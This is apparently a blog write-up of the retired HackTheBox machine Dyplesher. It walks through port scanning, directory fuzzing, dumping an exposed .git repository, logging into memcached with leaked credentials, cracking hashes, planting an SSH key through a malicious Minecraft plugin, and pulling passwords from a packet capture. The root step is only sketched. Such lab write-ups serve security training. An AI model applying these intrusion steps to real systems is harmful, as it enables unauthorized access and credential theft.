Hackthebox — Dyplesher

Summary

Today we have another linux machine is retired with IP 10.10.10.190

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.190
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-15 14:48 EET
Nmap scan report for 10.10.10.190
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
| 256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_ 256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=968c960820a086d9; Path=/; HttpOnly
| Set-Cookie: _csrf=zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:44 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:44 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==" />
| <meta name="_suburl" content="" />
| <meta proper
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=4228884f43ce6ee5; Path=/; HttpOnly
| Set-Cookie: _csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:50 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:50 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==" />
| <meta name="_suburl" content="" />
|_ <meta
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.70%I=7%D=6/15%Time=5EE76E3F%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2063,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;
SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=968c960820a086d9;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=zfXkCZCCL03J-dCZ6lH25oup
SF:VLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\
SF:x20Jun\x202020\x2012:54:44\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x
SF:20Jun\x202020\x2012:54:44\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<he
SF:ad\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA
SF:-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\
SF:"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20conte
SF:nt=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20
SF:/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hos
SF:ted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-refer
SF:rer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"zfXkCZCCL03J-dCZ6lH
SF:25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==\"\x20/>\n\t<meta\x20name=\"_subur
SF:l\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta\x20proper")%r(Help,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:HTTPOptions,189F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
SF:text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x2
SF:0Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=4228884f43ce6ee5;\x20
SF:Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg
SF:6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\x20
SF:Jun\x202020\x2012:54:50\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x20J
SF:un\x202020\x2012:54:50\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\
SF:x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content
SF:=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Co
SF:mpatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x
SF:20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=
SF:\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\
SF:n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted
SF:,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer
SF:\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"8sEcAMp478CzoxzyIS5f8n
SF:L8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==\"\x20/>\n\t<meta\x20name=\"_suburl\"
SF:\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.99 seconds
root@strike:~#

We have 3 open ports: 22(ssh), 80(http), 3000(…)

Web Enumerate

I found another hosts,So i add it for /etc/hosts directory
Open

Try to FUZZ

root@strike:~# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 4614

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 14 L 27 W 239 Ch ""
000009: C=200 1 L 2 W 23 Ch ".git/HEAD"
000094: C=404 9 L 31 W 280 Ch "_vti_bin/_vti_adm/adm000095: C=404 9 L 31 W 280 Ch "_vti_bin/_vti_aut/aut000320: C=404 9 L 31 W 280 Ch "administratoraccounts001160: C=404 9 L 31 W 280 Ch "database_administrati001161: C=404 9 L 31 W 280 Ch "Database_Administrati001326: C=404 9 L 31 W 280 Ch "Documents and Setting002021: C=200 14 L 27 W 239 Ch "index.php"
003946: C=404 9 L 31 W 280 Ch "system_administration003949: C=404 9 L 31 W 280 Ch "system-administration
Total time: 38.83439
Processed Requests: 4614
Filtered Requests: 4611
Requests/sec.: 118.8122

root@strike:~#

I found .git, But i can’t get access from browser, So i tried to dump the content using gitdumb tool

root@strike:~/git-dumper# ./git-dumper.py http://test.dyplesher.htb/.git /root/Dsktop/dump
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .
root@strike:~/git-dumper#

After dump i found credentials for Memcached username felamos, password zxcvbnm and service port 11211 in index.php
Let’s take a look using memchached-cli

root@strike:~#memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTWfelamosyuntao
dyplesher.htb>getpassword
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

Tried to crack with john

After that i decided to take a look for http://dyplesher.htb:3000 , I register and login

In felamos we could find gitlab.git and memcached.git
I tried to login with felamos credentials

Let’s download repo.zip and unzip

root@strike:~# cd Downloads/
root@strike:~/Downloads# unzip repo.zip
Archive: repo.zip
creating: repositories/
creating: repositories/@hashed/
creating: repositories/@hashed/4b/
creating: repositories/@hashed/4b/22/
inflating: repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
creating: repositories/@hashed/4e/
creating: repositories/@hashed/4e/07/
creating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/
inflating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
creating: repositories/@hashed/6b/
creating: repositories/@hashed/6b/86/
inflating: repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
creating: repositories/@hashed/d4/
creating: repositories/@hashed/d4/73/
inflating: repositories/@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads#

I dump this 4 hashes that end with .bundle in hash.sh file

root@strike:~/Downloads# cat hash.sh 
git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads# chmod +x hash.sh
root@strike:~/Downloads# ./hash.sh
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.Resolving deltas: 100% (12/12), done.Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.Resolving deltas: 100% (5/5), done.Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.Resolving deltas: 100% (40/40), done.Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.Resolving deltas: 100% (9/9), done.
root@strike:~/Downloads#

After searching i found user.db file and it contain hash

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

So let’s crack

Login again with new credentials user: felamos@dyplesher.htb and password: alexis1

Then I found the page “AddPlugin” and tried to add some files to see its response

We can also see that http://test.dyplesher.htb is deployed under /var/www/test/ and is owned by MinatoTW

For the IDE where we’ll write the Minecraft plugin we can eitheir use Eclipse

Use this method to creating a blank Spigot plugin

After puttinng your public key authorized_keys , Upload it on http://dyplesher.htb/home/add and load it on http://dyplesher.htb/home/reload

Now connect via SSH to MinatoTW account with your key

root@strike:~/Desktop#ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Jun 2020 03:05:00 PM UTC

System load: 0.37 Processes: 238
Usage of /: 6.7% of 97.93GB Users logged in: 0
Memory usage: 39% IP address for ens33: 10.10.10.190
Swap usage: 0% IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
MinatoTW@dyplesher:~$

But i didn’t find user flag, After searching i found that the user of MinatoTW is wireshark so we need to download and analyzing
Try to download capture.pcap

I found credentials for some users
*MinatoTW : bihys1amFov
*yuntao : wagthAw4ob / EashAnicOc3Op
*felamos : tieb0graQueg

Try to get felamos with this password

Gain user flag!

Privilege Escalation

I found lua is running, So we could use malicious plugin to get root

Plugin for lus and python script
https://github.com/khanmoin/htb_scripts/tree/master/rabbitmq_dyp

  • Write lua script on dyplesher machine with own id_rsa.pub

Write python script on our device

Lunch python server on dyplesher machine

Running python script

Response

Let’s try to connect

It work!
Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

Thx for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Starting to understand Multitenancy

The Fundamental Problem With Declarative UI

Development Progress of GateChain#1 (May 2020)

Preparing for the Greenville Revamp

Extracting PDF Highlights using Python

Introduction to software testing

A Web Developer at the GDC

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

TryHackMe- Frank and Herby try again walkthrough

HacktheBox [Shibboleth]

FORGE — HackTheBox WriteUp

Auth0 CTF write-up